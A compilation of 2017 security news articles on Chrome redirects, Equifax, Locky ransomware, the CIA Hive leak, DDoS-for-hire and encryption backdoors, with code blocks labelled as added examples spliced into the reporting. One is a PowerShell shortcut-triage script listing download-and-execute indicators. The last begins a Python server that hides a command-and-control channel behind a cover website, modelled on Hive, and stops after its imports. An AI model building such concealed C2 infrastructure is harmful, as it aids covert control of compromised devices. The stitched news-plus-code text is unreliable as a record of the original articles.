STE WILLIAMS

Google Updates Chrome to Prevent Unwanted Content, Redirects

Changes to Google Chrome aim to prevent users from being redirected to unexpected websites and unwanted content.

Google is updating its Chrome browser to protect users from redirection to unexpected websites and unwanted content, the company announced this week.

The next few releases of Chrome will contain three new protections.

According to Google, one in every five desktop users encounters unwanted content. Many users unexpectedly navigate to a new Web page, often as the result of embedded third-party content. In Chrome 64, redirects initiated from third-party iframes will show an infobar instead of redirecting – unless the user had been interacting with that frame.

Similarly, sometimes users click on a desired destination, which opens in a new tab, but the main window navigates to an unwanted page. In Chrome 65, this behavior will trigger an infobar and prevent the main tab from redirecting and circumventing Chrome’s pop-up blocker.

Other redirects are harder to detect; for example, when links to third-party sites are disguised as play buttons or other website controls. In early January, Chrome will update its pop-up blocker to prevent these sites from opening new windows or tabs.


Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/application-security/google-updates-chrome-to-prevent-unwanted-content-redirects/d/d-id/1330388?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Customers Punish Breached Companies

Equifax’s 25% reduction in share value and other industry-wide stats show that consumers aren’t so apathetic about cybersecurity after all.

Many executives don’t take secondary breach costs very seriously: the numbers have long been tricky to pin down and many within the C-suite believe that consumer breach fatigue and apathy about cybersecurity buffer their brand in the wake of a breach.

But growing evidence is showing that customers really do care, and they’ll put a wallop on the brand when the circumstances are egregious enough.

This is coming crisply into focus in the wake of the Equifax breach. Yesterday the firm released its third quarter earnings results, along with estimates of primary breach costs like forensic investigation, remediation, and consumer credit reporting. The contrast between the two sets of numbers should act as an example to CEOs and board directors as to the true risk that big breaches can pose to income and business health. 

According to Equifax, breach costs are currently measuring up to approximately $87.5 million. More troubling, though, is the precipitous drop in revenue Equifax experienced in the wake of the breach.

In 2017 the credit reporting agency was flying high with huge quarterly increases in net income. First quarter saw a 25% quarter-to-quarter gain and a whopping 50% gain in revenue compared to first quarter of 2016. Second quarter saw an 8% quarterly gain and a 26% rise in net income compared to second quarter of 2016, up to $165.4 million.

Then the breach made the engines fall off – after the early September announcement, revenue plummeted to $96.3. That is an incredible 42% quarterly drop in net revenue, and a 27% drop compared to the same time period last year. And that’s just net revenue: Share value has been similarly ravaged. Since the September 7th breach announcement, the firm has lost just over a quarter of its stock valuation.

The circumstances with Equifax are different compared to mega breaches of the past, where company stock valuations have bounced back fairly quickly. The TJXs and Targets of the world primarily deal in goods and services, but Equifax’s core business is in information. Protecting it should be a core competency and customers and shareholders are ticked.

Nevertheless, this event may still be a global bellwether showing that consumers and shareholders have had it with all breached companies. Their antennae are up with regard to how companies handle their private data, and they’ll change their behavior if they have evidence that companies aren’t doing what they need to do to protect that data.

Just this week a Gallup poll showed that two-thirds of consumers today worry about hackers stealing their financial information – nearly double the amount of those worried about having their car broken into, being burglarized, or being the victim of terrorism.

Meantime, other market data has bubbled up this year that translates that concern into real brand value impacts for companies that aren’t doing their security due diligence. A study in September by YouGov BrandIndex tracked brand scoring of a number of major brands following a mega breach in recent years. Equifax saw the most precipitous drop in brand scoring, but other companies like Anthem Blue Cross, Home Depot, and Ebay all saw attrition to their scores in the wake of a breach.

Meanwhile, earlier this year Ponemon Institute concluded that in a study of 113 companies they suffered an average 5% drop in stock value following the disclosure of their breach. The firm showed that nearly a third of consumers report terminating relationships with breached companies in the wake of the incident.

It’s a worry that CMOs and marketing directors at least recognize. Within this audience almost three-quarters say that the biggest cost of a security incident is loss of reputation and brand value. That’s way more than the fewer than half of IT leaders who would agree with that sentiment.

“Consumers and shareholders are tangibly holding companies responsible for consumer personally identifiable information (PII), and for data leaks and breaches,” says Lisa Baergen, marketing director for NuData Security, a Mastercard company. “Companies need to break past outdated notions. While internal departments debate responsibility, consumers and shareholders are holding the brand responsible – making it everyone’s problem. The tangible economic impacts of breaches will only grow.”


Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.

Article source: https://www.darkreading.com/informationweek-home/customers-punish-breached-companies/d/d-id/1330387?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

New Locky Ransomware Takes Another Turn

A newly discovered strain of Locky ransomware has been discovered masquerading as legitimate Microsoft Word documents.

Another evolution of Locky ransomware is spreading through malicious attachments disguised as legitimate documents from productivity applications like Microsoft Word and Libre Office.

Researchers at Avira Virus Lab detected the ransomware earlier this week. This form of Locky has the same “.asasin” extension as a strain PhishMe picked up in October. However, it’s crafted to manipulate users with a reportedly “protected document” disguised as this:

(Image: Avira)

Users who double-click the image prompt a series of actions, which ultimately result in their files being encrypted under the “.asasin” file extension name. Multiple other files, with payment details, are written onto the disk.

Behind the image from the Word document, researchers saw a LNK file, otherwise known as a Windows shortcut. They realized the shortcut is intended to run a PowerShell script, which downloads another PowerShell script from an embedded link and runs it.

The second script connects to the Internet and downloads a Windows executable file, which includes several stages of code obfuscation and misleading data to trick victims and analysts into thinking the file is clean and from a legitimate Microsoft application.
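The delivery chain described above (a Windows shortcut that launches PowerShell, which fetches and runs a second script) is something defenders can hunt for. The following is an added example, not code from the article or from Avira or PhishMe: it triages `.lnk` files under a folder of your choosing (the `$Path` default is an assumption) using the standard `WScript.Shell` COM object to read each shortcut’s target and arguments, and flags shortcuts that start PowerShell with download or decode switches.

```powershell
# Added example: triage .lnk files that launch PowerShell with download/decode arguments.
# Assumes a Windows host where the WScript.Shell COM object is available (it is by default).
param(
    [string]$Path = "$env:USERPROFILE\Downloads"   # folder to scan; assumed default
)

# Argument fragments worth a second look; this list is constructed for the example.
$SuspiciousArgs = @(
    'DownloadString', 'DownloadFile', 'Invoke-WebRequest', 'Invoke-Expression', 'IEX ',
    '-enc', '-EncodedCommand', '-w hidden', '-WindowStyle Hidden', 'http://', 'https://'
)

$shell = New-Object -ComObject WScript.Shell

Get-ChildItem -Path $Path -Filter *.lnk -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
    $file      = $_
    $lnk       = $shell.CreateShortcut($file.FullName)   # parses target and arguments
    $target    = [string]$lnk.TargetPath
    $arguments = [string]$lnk.Arguments

    # Does the shortcut start PowerShell, either directly or via another launcher (cmd /c ...)?
    $launchesPowerShell = ($target -match '(?i)(powershell|pwsh)(\.exe)?$') -or
                          ($arguments -match '(?i)powershell|pwsh')

    # Which download/decode indicators appear in the arguments? (-like is case-insensitive)
    $hits = @($SuspiciousArgs | Where-Object { $arguments -like "*$_*" })

    if ($launchesPowerShell -or $hits.Count -gt 0) {
        $verdict = if ($launchesPowerShell -and $hits.Count -gt 0) { 'HIGH' }
                   elseif ($launchesPowerShell)                    { 'MEDIUM' }
                   else                                            { 'LOW' }
        [pscustomobject]@{
            Verdict    = $verdict
            File       = $file.FullName
            Target     = $target
            Arguments  = $arguments
            Indicators = ($hits -join ', ')
        }
    }
} | Format-Table -AutoSize
```

A shortcut embedded inside a Word document, as in the sample described above, is stored as an OLE object rather than as a loose `.lnk` file, so extract embedded objects first if you want to apply the same check to documents.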

Once it’s on the victim’s machine, the malware collects information about the operating system and sends it, encrypted, to the command-and-control server and retrieves the encryption key.

“We are seeing a rapid evolution in the way Locky is delivered,” says Brendan Griffin, threat intelligence manager and malware analyst at PhishMe. “Locky stays the same, but the delivery technique is where we’ve really seen the most change.”

Evolution of Locky: What does it mean?

Ransomware is a growing problem for many organizations, and Locky is a common attack to watch.

“Locky has been one of the most popular malware libraries for a long time,” says John Pironti, president of IP Architects. “It has been maturing, and that doesn’t surprise me because it has been successful in financial gain.”

It’s common to see adversaries refresh and renew old approaches to see which is most effective, he continues. Attackers will slightly change their links or scripting to initiate activities to get to the same payload. The idea is to avoid detection and trick more users.

It’s “misleading” to call this recent finding a new strain of Locky, Griffin adds. The “.asasin” strain, which PhishMe also detected, uses a more robust and more verbose script-based delivery mechanism than other forms of Locky seen in the past. It collects basic information from the machine, nothing personally identifiable. This is the same malware arriving on a different path.

“We’ve seen people embed scripts inside of Word documents, Excel links, things like that as a way to generate code and scripts that can grab more malware packages,” Pironti says. People are more likely to open an attachment, the vector in Avira’s finding, than they are to click a link.

“We spend so much time telling people not to click links … and not nearly as much time telling them not to click attachments,” Pironti adds. Many employees click attachments all day as part of their jobs; to them, Word or Excel files aren’t as suspicious as a potentially phishy link.

He notes that the “.asasin” extension is amusing. “They want to work off fear and force people to pay,” he says.

This evolution also underscores how attackers often revert to simple techniques, Griffin adds. They’re taking advantage of the fact that phishing emails, while basic, work. “Why would they choose a really complex, sophisticated, unreliable means of delivering malware?” he says.

Defending against fake applications

Griffin points out that this is a clear example of abuse of Microsoft’s Dynamic Data Exchange (DDE), a protocol on which Microsoft just published guidance for users.

Earlier this week, Microsoft published an advisory, following activity by Fancy Bear, which abused DDE fields to distribute malware. Microsoft is not planning to issue a patch but has provided steps for administrators to disable DDE, a protocol for transferring data between applications. If the protocol is exploited, an attacker could take control of an affected system.

Admins can turn off DDE by creating and setting registry entries for Microsoft Office based on the applications installed on the system. After this, data will no longer update automatically between applications, which could be problematic for people who rely on data feeds to update Excel. Microsoft warns doing this incorrectly could cause serious problems that would require reinstallation of the operating system.


Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University.

Article source: https://www.darkreading.com/endpoint/new-locky-ransomware-takes-another-turn/d/d-id/1330383?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

How Twitter outrage hatches in tiny fringe groups on 4chan and Reddit

In June, a 29-year-old man who fired a military-style assault rifle inside a popular Washington pizzeria, wrongly believing he was saving children trapped in a sex-slave ring, was sentenced to four years in prison.

The judge said at the time that it was “sheer luck” that Edgar Maddison Welch didn’t kill anybody. But it wasn’t luck that planted the so-called “PizzaGate” conspiracy theory in his head: we can credit a particularly dark corner of 4chan for that.

It started with hacked emails on WikiLeaks… which got scoured for political wrongdoing in the Clinton campaign staff by a popular Reddit forum dedicated to Donald J. Trump and 4chan’s far-right fringe message board… and which wound up confabulated into PizzaGate by somebody on 4chan who connected the phrase “cheese pizza” to pedophiles, who use the initials “c.p.” to denote child pornography on chat boards.

PizzaGate is only one of a long lineage of fake news spawned on 4chan’s message boards. Reading the output of what the Guardian once dubbed the “lunatic, juvenile, brilliant, ridiculous and alarming” 4chan community can melt your brain.

But you’ve got to hand it to them: the site that persuaded web users to microwave their iPhones has always been good at clogging up the internet with its memetic fatbergs.

In fact, alt-right communities within 4chan and Reddit are veritable hatcheries from which crawl a surprisingly large number of the headlines that eventually infest Twitter.

That’s the finding of a study from the University of Alabama at Birmingham, Cyprus University of Technology, University College London and Telefonica Research.

The results of the study were published last week in a paper at the ACM Internet Measurement Conference in London.

The researchers studied mainstream and “alternative” news shared on Twitter, Reddit and 4chan, with the aim of finding out how “misleading, false, or agenda-driven information” spreads online, leaving swathes of duped people in its wake. They analyzed millions of posts to measure how mainstream and alternative news flows between those platforms.

The researchers found that tightly knit, highly active fringe communities are an important part of our current news ecosystem and often succeed in spreading alternative news to mainstream social networks and the greater web.

This is the first large-scale measurement of how mainstream and alternative news flows through multiple social media platforms. The paper focuses on Twitter, 4chan and Reddit because in spite of their differences, all three are generally accepted as being drivers of substantial portions of the online world; because of anecdotal evidence that specific sub-communities within Reddit and 4chan act as incubators of fake news; and because all three have a big impact on people’s opinions and actions when they spread fake news.

One of the researchers, Jeremy Blackburn, assistant professor of computer science in the UAB College of Arts and Sciences, told Phys.org that the smaller, fringe communities on Reddit and 4chan are where many alternative news pieces incubate before spreading to mainstream platforms:

The content and talking points are refined until they finally break free and make it to larger, more mainstream communities.

The researchers analyzed more than 400,000 tweets, 1.8 million posts and comments on Reddit, and 97,000 posts and replies on 4chan that contain URLs from 99 news sites. The data sets covered activity on the three platforms between 30 June 2016 and 28 February 2017, with a few gaps due to web crawler failure.

Using a mathematical technique called the Hawkes process, the team of researchers measured the influence of six subreddits: “The_Donald,” “politics,” “worldnews,” “AskReddit,” “conspiracy,” and “news.” They also measured the “/pol/” board on 4chan (the site’s Politically Incorrect board) and Twitter: a platform that they said is a major influence on the posting of URLs from alternative news sites on other social platforms.

In fact, Twitter has a greater effect on spreading alternative news than it does on spreading mainstream news stories.

What does this all add up to? Well, that it’s a two-way street. Just as Twitter to a large degree influences the alternative news URLs that wind up on other platforms, such as Facebook, the alternative URL producers also feed Twitter.

The biggest alternative “news” sources that spread their URLs to Twitter are The_Donald subreddit – mostly a community of Donald Trump supporters – and 4chan’s /pol/ board, which is known for being stuffed with hate speech and racism.

The researchers note that they only looked at a closed system of eight platforms and subreddits, but it’s clear that Twitter is “undoubtedly effective at propagating information.”

If fervent groups on 4chan and Reddit succeed in getting their URLs picked up on Twitter, those URLs can be disseminated far and wide. The tiny size of communities like the alt-right nooks and crannies of /pol/ and The_Donald is belied by their outsized influence, in other words:

The influence these two communities have on Twitter is likely to have a disproportional impact on the greater Web compared to their relatively minuscule userbase.

What are we supposed to do about all this? There is little to nothing stopping sites from disseminating disinformation. Publishing is as cheap as the air that Wi-Fi slices through. Too bad that the consequences of outrageous fabrications aren’t as ethereal.

There is nothing ethereal about a deluded man with an assault rifle.

But at least understanding how fake news is born (or where, as in the case of the recently revealed Russian troll farm) is a start. The researchers plan to keep going, with their next target being to explore advanced image recognition techniques to look for screenshots shared among the different platforms, as well as Natural Language Processing methods to determine whether stories become a part of the platform’s narrative of events.

They believe that understanding how these alternative news sources influence online platforms can help in efforts to detect, and to mitigate, misleading information. Agenda-driven information. False information. Fake news. Conspiracies. Nonsense spun out of stolen conversations about cheese pizza baked in minds with overheated imaginations.

Godspeed, researchers, godspeed.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/Z835bEmTlRE/

What do Microsoft’s highly secure Windows 10 device standards tell us?

This week, Microsoft said something about PCs it has never clearly said before: it spelled out a hardware specification it thinks PC makers should adopt to ensure their Windows computers are “highly secure”.

That might not sound terribly dramatic, but in the understated Microsoft way it signals an important change.

Up to now, and for as long as anyone can remember, the only aspect of hardware Microsoft (and almost everyone else in the industry) cared about was how fast the components inside a PC were.

Under this model, securing the PC was a job done by the OS itself and dedicated applications running on top of it, which was largely independent of how the computer was made.

No longer – increasingly security is being baked in at a lower level and that means doing it in a mixture of hardware tightly integrated with secure firmware.

Reading the specs, you notice that performance isn’t off the menu completely.

A secure PC should run 64-bit Intel or AMD 7th-generation processors (Skylake or A-Series/Athlon onwards) on 8GB of RAM. At first it looks as if this might be something to do with hardware virtualisation (also in the spec) but is really more tied up with the code and memory-protection mechanisms built into these chips as Virtualisation Based Security (VBS).

And it doesn’t stop with the processor as the system’s other chipsets must support specific types of memory and virtualisation management too.

Unsurprisingly, systems must ship with a TCG v2.0 Trusted Platform Module (TPM) and implement verified boot using something like Intel’s Boot Guard.

Critically, what used to be called BIOS firmware must meet the latest standards from UEFI 2.4 or later, and be able to resist tampering while supporting updating.
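To see how an existing machine measures up against the requirements listed above, here is an added example (not from the article or from Microsoft) that checks a Windows 10 host for the items that can be read from standard CIM classes and cmdlets: 64-bit OS, 8GB of RAM, a TPM reporting spec version 2.0, UEFI with Secure Boot, and whether Virtualisation Based Security is running. Processor generation, Boot Guard and the UEFI 2.4 revision are not exposed this way, so the Secure Boot check stands in as a proxy for verified boot; the 7.5GB RAM threshold is an assumption that allows for firmware-reserved memory.

```powershell
# Added example: compare this host against the hardware requirements the article lists.
# Run from an elevated PowerShell prompt (Confirm-SecureBootUEFI requires administrator rights).
$results = [ordered]@{}

$os = Get-CimInstance Win32_OperatingSystem
$cs = Get-CimInstance Win32_ComputerSystem
$results['64-bit OS']   = $os.OSArchitecture -like '64*'
$results['RAM >= 8 GB'] = ($cs.TotalPhysicalMemory / 1GB) -ge 7.5   # assumed slack for reserved memory

# TPM presence and spec version; SpecVersion reads like "2.0, 0, 1.38"
$tpm = Get-CimInstance -Namespace root\cimv2\Security\MicrosoftTpm -ClassName Win32_Tpm -ErrorAction SilentlyContinue
$results['TPM present'] = [bool]$tpm
$results['TPM 2.0']     = [bool]$tpm -and ((($tpm.SpecVersion -split ',')[0]).Trim() -eq '2.0')

# UEFI firmware with Secure Boot enabled; the cmdlet throws on legacy BIOS systems
try   { $results['UEFI Secure Boot on'] = [bool](Confirm-SecureBootUEFI) }
catch { $results['UEFI Secure Boot on'] = $false }

# Virtualisation Based Security: VirtualizationBasedSecurityStatus 2 = running, 1 = enabled, 0 = off
$dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
$results['VBS running']        = [bool]$dg -and ($dg.VirtualizationBasedSecurityStatus -eq 2)
$results['Hypervisor present'] = [bool]$cs.HypervisorPresent

$results.GetEnumerator() | ForEach-Object {
    [pscustomobject]@{ Requirement = $_.Key; Met = $_.Value }
} | Format-Table -AutoSize

if ($results.Values -contains $false) {
    'Host does NOT meet all of the listed requirements.'
} else {
    'Host meets the listed requirements that can be checked here.'
}
```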

I’ll spare you the rest of the spec’s gory detail and skip to the ‘what it all means’ bit…

The first thing that it shows is that securing PCs is increasingly a job that’s done (or at least begun) in the first few seconds after it’s turned on, when the system checks to see that important software hasn’t been interfered with.

This isn’t brand new, of course, but it is increasingly central to defending PCs, not simply the main UEFI layer and its various functions but also the other hidden firmware that might be present in the computer (remember the suspected low-level hacking of hard drives?). It also needs to be managed when vulnerabilities are exposed.

Secondly, we learn something about the future, specifically how things like Mode Based Execution Control (MBEC) might soon be used to boost Windows Defender Application Guard (WDAG), a Hyper‑V virtualization isolation layer used by, among other things, the Edge browser.

This is only available for enterprise customers today but the spec hints that this will change at some point to include everyone.

Which brings us to the version of Windows that fully enables WDAG, namely Windows 10 version 1709, Fall Creators Update (released in mid-October), the Windows version that Microsoft’s new spec assumes as a sort of reference year zero.

Is all this a lot to ask?

If you don’t have a PC that meets these requirements – and almost everyone who bought a PC or laptop before last year won’t – it might seem so.

There will also be cynics who suspect that PC companies will use it to harry people into upgrading their PCs more often.

Then there are convenient exceptions such as the strange beast that is Windows 10 S, the cut-down Chromebook-like-but-not-quite computer, that isn’t required to meet the spec because, frankly, it can’t.

Nonetheless, corporate buyers will pay close attention to the new spec and it could even end up buried inside compliance regimes, in time.

If that happens, Microsoft’s spec will end up being a two-minute read with two-decade implications.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/NfqZj_8TjFU/

Wikileaks drama alert: CIA forged digital certs imitating Kaspersky Lab

The CIA wrote code to impersonate Kaspersky Labs in order to more easily siphon off sensitive data from hack targets, according to leaked intel released by Wikileaks on Thursday.

Forged digital certificates were reportedly used to “authenticate” malicious implants developed by the CIA. Wikileaks said:

Digital certificates for the authentication of implants are generated by the CIA impersonating existing entities. The three examples included in the source code build a fake certificate for the anti-virus company Kaspersky Laboratory, Moscow pretending to be signed by Thawte Premium Server CA, Cape Town. In this way, if the target organization looks at the network traffic coming out of its network, it is likely to misattribute the CIA exfiltration of data to uninvolved entities whose identities have been impersonated.

Eugene Kaspersky, chief exec of Kaspersky Lab, sought to reassure customers. “We’ve investigated the Vault 8 report and confirm the certificates in our name are fake. Our customers, private keys and services are safe and unaffected,” he said.

Hackers are increasingly abusing digital certs to smuggle malware past security scanners. Malware-slinging miscreants may not even need to control a code-signing certificate. Security researchers from the University of Maryland found that simply copying an authenticode signature from a legitimate file to a known malware sample – which results in an invalid signature – can result in antivirus products failing to detect it.

Independent experts reckon the CIA used Kaspersky because it’s a widely known vendor.

Martijn Grooten, security researcher and editor of industry journal Virus Bulletin, said: “The CIA needed a client certificate to authenticate its C&C comms, couldn’t link it to CIA and used ‘Kaspersky’, probably just because they needed a widely used name. No CA hacking or crypto breaking involved. Clever stuff, but not shocking. Not targeted against Kaspersky.”

Revelations about the abuse of digital certificates by the US spy agency came as Wikileaks released CIA source code and logs for a malware control system called Hive, as previously reported.

Security expert Professor Alan Woodward criticised the release with a reference to the Equation Group (NSA hacking unit)/Shadow Brokers leak. “Wikileaks is now releasing source for exploits in Vault 7. Do they remember what happened last time such exploit code was leaked? Standby for another WannaCry.”

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/10/cia_kaspersky_fake_certs_ploy/

Hackers hired for year-long DDoS attack against man’s former employer

US federal prosecutors in Minnesota have charged a 46-year-old man with hiring a cyberhitman – well, technically, three hacking services – to launch a year-long campaign of distributed denial of service (DDoS) attacks on his former employer.

Prosecutors say that John Kelsey Gammell, 46, contacted seven DDoS services and paid monthly subscriptions to three of them in order to bring down Washburn Computer Group, a point-of-sale system repair company in Monticello, Minnesota. Between July 2015 and September 2016, Gammell also allegedly used the services to go after a slew of other targets, including the networks of the Minnesota Judicial Branch, Hennepin County, several banks and a few employment contracting companies he worked at.

According to the Star Tribune, Gammell rejected a plea deal when he appeared in a Minneapolis court last week. The deal would have resolved all charges and capped his possible prison sentence at a mandatory 15 to 17 years. The newspaper reports that a federal magistrate is reviewing motions to dismiss the case or suppress evidence.

In a criminal complaint filed in April 2017, FBI Special Agent Brian Behm said in a sworn affidavit that when Washburn first began experiencing shutdowns of multiple websites, server log files weren’t any help in finding the culprit. That’s because the IP addresses connected to the DDoS attack led back to a US-based virtual private network (VPN) that anonymized the true source of incoming internet access. Like many anonymizing services, the VPN didn’t maintain logging information to show who was using it, Behm explained.

But two taunting emails asking Washburn if the company had any “ongoing IT issues” that they needed help with – sent while the DDoS attacks were ongoing – were a whole lot easier to track. Google and Yahoo, both under grand jury subpoenas, coughed up the IP addresses associated with the email accounts that sent the jeers, which were accompanied by the image of a laughing mouse. The FBI says that the Gmail account and the Yahoo account that sent the messages were created with an IP address associated with Gammell’s home address and an AT&T cellphone number that pointed to Gammell as the subscriber.

A search warrant served on Google showed that between May 2015 and September 2016, Gammell allegedly showed interest in, or made purchases at, seven DDoS-for-hire sites. Also known as “booters” or “stressers,” these sites sell monthly subscriptions that let buyers direct DDoS attacks against IP addresses or websites of their choosing. You get what you pay for: the premium plans boost the duration and intensity of the attack.

Based on emails, Gammell allegedly had three favorite cyber goon squad services: cStress, vDOS and booter.xyz. Prosecutors say he shelled out about $235 to cstress.net, ranging from the basic “All Included” $19.99 service to the “Premium” service at $39.99. His monthly payments to the services went as high as $199.

cstress.net is offline, but Behm says he found an archived main page that shows that the “Premium” package could be used to “Stress Large Servers and Websites,” that it was capable of “Full Hour Stresses,” and that it provided “30Gbps of Dedicated Bandwidth” and “Unlimited Boots.”

For a criminal enterprise, it was all very cordial, all very professional. Behm says he found an email thanking Gammell for his purchase from another DDoS-for-hire service called inboot. In upgrading to “diamond” monthly membership at booter.xyz, Gammell allegedly praised the service and told his correspondent that he recommends it to others.

Why the persistence, and money spent, in allegedly plaguing a former employer? According to the criminal complaint, Gammell had worked at Washburn for 17 years and had left, under good terms, three and a half years ago. But a dispute boiled up over payment for training services Gammell had provided after he left the company.

According to the Star Tribune, Gammell’s attorney, Rachel Paulose, has argued that it wasn’t Gammell that attacked Washburn. No, it was the “cyberhit men,” she said: why not go after them?

The government has failed to charge a single one of those ‘cyberhitmen’ services, named and evidently well known to the government. Instead the government’s neglect has allowed the professional cyberhitmen for hire to skip off merrily into the night.

Funny thing about that: skipping off merrily into the night doesn’t exactly describe what happened to at least one of Gammell’s purported favorite hitmen services. “Getting busted by Israeli police” is more like it. Back in September 2016, two Israeli teenagers – the co-owners behind vDOS – had their service taken down by a massive hack, and the two 18-year-old men were arrested.

And all the evidence the FBI got from a known security researcher about vDOS? Toss it, Paulose says: the data could have been obtained through hacking.

The Washburn attacks were “essentially a prank on a dormant site not doing business,” she said.

The Star Tribune quoted this comeback from Assistant U.S. Attorney Timothy Rank:

Even if Mr. Gammell thinks it’s a prank, it’s a criminal prank.

Gammell is facing a charge of “knowingly [causing] the transmission of a program, information, code, or command, and as a result of such conduct, intentionally [causing] damage without authorization, to a protected computer.”


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/QB6YcQLuz5s/

US government seizes Texas gun mass murder to demand backdoors

While US President Donald Trump thinks it’s too early to discuss gun control in the wake of Sunday’s Texas church massacre – America’s latest mass shooting – his Deputy Attorney General Rod Rosenstein is just fine exploiting the murder-suicide of 26 people to push for backdoors.

Specifically, a backdoor so investigators can forcibly and easily unlock devices, decrypting and presenting the information they contain on demand.

Speaking at a breakfast meeting with biz leaders in Linthicum, Maryland, Rosenstein said the FBI had the shooter’s phone, understood to be an iPhone, in their possession but were unable to unlock it to view the contents. Preventing agents from accessing devices in criminal investigations should not be allowed, he argued.

“No reasonable person questions our right, and obligation, to access the phone,” Rosenstein said today.

“But the company that built it purposely designed the operating system so that we cannot access it. Maybe we will find a way to get into that phone, as we did in the San Bernardino case, but it’s going to cost a great deal of time and money, and in some cases it costs us lives. We need to find a solution to deal with warrant-proof encryption.”

In other words, Rosenstein wants to avoid the previous court battles with moneybags Apple, and just lean on the iGiant hard enough to make it unlock the killer’s cellphone. Right now is not a good time for tech giants, given all the headlines about fake news and Russian-bought political ads: Apple has largely distanced itself from that mess, but is still tarnished by it simply by being another rich Silicon Valley beast.

Meanwhile, Apple has said it offered to help the Feds in researching the case before the agency even approached Cupertino. The iGiant also kindly offered to throw its lawyers at any legal demand from the FBI as fast as it could to get the whole thing over and done with as soon as possible.

“Our team immediately reached out to the FBI after learning from their press conference that investigators were trying to access a mobile phone,” Apple said in a statement to journalists.

“We offered assistance and said we would expedite our response to any legal process they send to us. We work with law enforcement every day. We offer training to thousands of agents so they understand our devices and how they can quickly request information from Apple.”

Pattern of incompetence

If the iPhone is a recent one, the FBI could have unlocked the dead murderer’s handset using his finger, if the phone was set up to accept fingerprint logins. Assuming the device had a suitably configured fingerprint sensor, the FBI had a 48-hour window from the last unlock in which to use the prints to open the mobe. After that, iOS falls back to demanding the passcode, which agents don’t have. The fact the Feds only started complaining about not being able to access the phone two days after the mass shooting indicates that either the phone didn’t use fingerprint locking or agents missed their chance.

It was a similar story with the case of the San Bernardino shooter. There, hours after the shooting, the killer’s employer – working with local FBI agents – changed his iCloud password. This gave them access to his existing backups, but stopped the phone from syncing any fresh data to iCloud. Apple argued it couldn’t easily unlock the handset due to the encryption system used, and in any case, was unwilling to be forced into producing software tools for the US government to break into devices on demand.

The FBI has almost 7,000 phones in its possession that it can’t get into. You have to wonder why it, and Rosenstein, always chooses the terrorist cases to push their argument that Uncle Sam needs backdoor access to encrypted communications and data at rest.

They also never mention that the best minds in the field of cryptography have repeatedly warned that there is no known way to build a backdoor into a truly end-to-end secure system that only crime investigators can use: someone else will find the back passage and abuse it to decrypt people’s stuff. The NSA agrees, probably because it knows that if a backdoor were mandated the Russians and Chinese would make it a priority to find and exploit it.

But that’s not going to stop Rosenstein and the FBI from their endless crusade to bork encryption, even if it means exploiting the murder of American citizens. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/us_government_texas_shooting_iphone_backdoor/

Learn client-server C programming – with this free tutorial from the CIA

WikiLeaks has shoved online more internal classified stuff nicked from the CIA – this time what’s said to be the source code for spyware used by Uncle Sam to infect and snoop on targets’ computers and devices.

Today’s code dump is part of a larger collection called Vault 8, and spills onto the internet what is claimed to be the CIA’s Hive tool. This is a two-part tool: one half runs on a snoop-controlled server and issues commands to the other half, the client, which lurks quietly on an infected device or computer.

How exactly the client side of the malware gets into the endpoints to do its spying isn’t revealed: there are no exploits for vulnerabilities in the code, nor any zero days uncovered, it appears. It’s a remote-control tool that sheds light on the CIA’s programming abilities – and the C code is pleasantly clean from our glance through it – and handily lays out a way to perform server-client operations. A free US taxpayer-funded programming tutorial, if you will.

The software could be used by miscreants to build functionality into their own software nasties, however, there are tons of other examples out there they could crib from, so today’s dump isn’t exactly arming crooks with powerful cyber-weapons. It’s just embarrassing for the CIA, if the code is indeed the agency’s classified blueprints.


The spyware is designed to be installed on ARM, MIPS, PowerPC and x86 devices powered by Linux, particularly routers and internet-connected cameras from MikroTik and AVTech. It communicates over TLS with a remote server. That server appears to be serving a normal website to passing visitors, but the implant uses a TLS feature called optional client authentication, presenting a client certificate during the handshake, to reach hidden areas where it can receive instructions to execute. The client can be instructed to download or upload files, delete documents, and run commands.

Agents would ensure the malware is not traced back to them: the server should run in a throwaway virtual machine, and be dressed up to look like an innocent, dull site. The HTTPS connections are allegedly established using certificates that appear to belong to antivirus maker Kaspersky Lab. Spies would be expected to connect to the control servers via a web of VPNs, proxies and other cover servers.

“Even the most sophisticated malware implant on a target computer is useless if there is no way for it to communicate with its operators in a secure manner that does not draw attention,” the Julian-Assange-led WikiLeaks said of the software.

“Using Hive even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet.”

No actual executables are included, so you would have to build the programs yourself. The software’s operation is described here, and the version leaked this week dates between August 2013 and October 2015, apparently.

“The cover domain delivers ‘innocent’ content if somebody browses it by chance. A visitor will not suspect that it is anything else but a normal website,” WikiLeaks claimed.

“The only peculiarity is not visible to non-technical users – a HTTPS server option that is not widely used: Optional Client Authentication. But Hive uses the uncommon Optional Client Authentication so that the user browsing the website is not required to authenticate – it is optional.”
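What that cover-versus-command split looks like in practice, as an added example in Python that is not Hive’s code and is not taken from the leak: the server requests a client certificate but does not require one (`ssl.CERT_OPTIONAL`), so ordinary browsers complete the handshake without one and get the cover page, while a client whose certificate chains to the operator’s private CA and carries an allow-listed common name is routed to the tasking channel. The CA, the certificate common names, the URL layout and the tasking queue are assumptions made up for the illustration.

```python
"""Cover site versus command channel on one TLS listener.

Added illustration, not Hive's code. The allow-list, tasking queue,
URL scheme and file paths below are assumptions for the example.
"""
import socket
import ssl
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

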